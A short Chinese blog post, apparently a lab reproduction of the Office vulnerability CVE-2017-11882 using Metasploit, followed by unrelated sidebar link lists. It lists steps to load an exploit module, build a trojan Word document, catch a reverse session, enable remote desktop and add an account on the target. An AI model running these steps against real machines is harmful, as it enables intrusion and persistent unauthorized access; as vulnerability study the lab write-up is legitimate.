当前位置:网站首页>CVE_2017_11882漏洞复现(Metasploit开启NT远程桌面添加账户)
CVE_2017_11882漏洞复现(Metasploit开启NT远程桌面添加账户)
2022-07-28 05:20:00 【cainsoftware】
靶机安装windows office 2016
2.rb复制文件到攻击机的msf的模块文件下并刷新
这里注意:msf放到库文件下 不能用- 只能用下划线 _ 不然刷新库 不认
3.设置参数 运行并生成 木马doc
4.运行监听 靶机执行木马
注意: 这边连接后并不会直接回显,需要用seesions –i 1的方式来链接反弹
5.开启远程桌面 run post/windows/manage/enable_rdp
6.添加远程桌面密码run post/windows/manage/enable_rdp USERNAME=cain PASSWORD=cain
7.连接远程桌面 命令: rdesktop 192.168.128.6
边栏推荐
猜你喜欢
【uni-app】uni-app中scroll-into-view的使用
Books - social animals
基于php心理健康服务系统获取(php毕业设计)
Review of metallurgical physical chemistry -- cathodic polarization, overpotential, anode and anode process in metal electrodeposition
蓝桥代码 翻硬币(我这样写也通过了,官网测试是不是有问题)
Zotero——一款文献管理工具
[uni app] the use of scroll into view in uni app
Some problems of ArcGIS Engine Installation
ArcGIS之Model Builder
单调队列,洛谷P1886 滑动窗口
随机推荐
js-宏任务和微任务
Global event bus
JS = = and = = = differences
标准C语言学习总结3
Help document making based on easy CHM and vs
Problem set in the project
cmd和npm基础命令
Interface idempotency problem
使用sourcetree推送仓库时 Failed to connect to www.google.com port 80: Timed out
(php毕业设计)基于php学生作业提交管理系统获取
基于Easy CHM和VS的帮助文档制作
JS字符串方法大全
C语言通讯录系统
正则表达式
Competition arrangement in GIS field (incomplete statistics)
js中==和===区别
Microsoft Edge浏览器插件(1)
Canvas绘图2
Model builder of ArcGIS
ES6 new data types -- > symbol, map, set